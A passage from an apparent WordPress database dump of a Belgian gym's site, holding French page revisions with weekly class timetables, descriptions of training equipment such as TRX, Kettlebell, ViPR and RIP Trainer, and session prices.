que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:23:57', '2013-07-04 16:23:57', '', 11, 'http://www.crosstrainingcenter.be/?p=280', 0, 'revision', '', 0),
(281, 1, '2013-07-04 16:27:23', '2013-07-04 16:27:23', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:27:23', '2013-07-04 16:27:23', '', 11, 'http://www.crosstrainingcenter.be/?p=281', 0, 'revision', '', 0),
(282, 1, '2013-07-04 16:28:48', '2013-07-04 16:28:48', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:28:48', '2013-07-04 16:28:48', '', 11, 'http://www.crosstrainingcenter.be/?p=282', 0, 'revision', '', 0),
(285, 1, '2013-07-04 16:34:15', '2013-07-04 16:34:15', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:34:15', '2013-07-04 16:34:15', '', 11, 'http://www.crosstrainingcenter.be/?p=285', 0, 'revision', '', 0),
(283, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 22, 'http://www.crosstrainingcenter.be/?p=283', 0, 'revision', '', 0),
(318, 1, '2013-07-04 19:38:20', '2013-07-04 19:38:20', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Une séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: 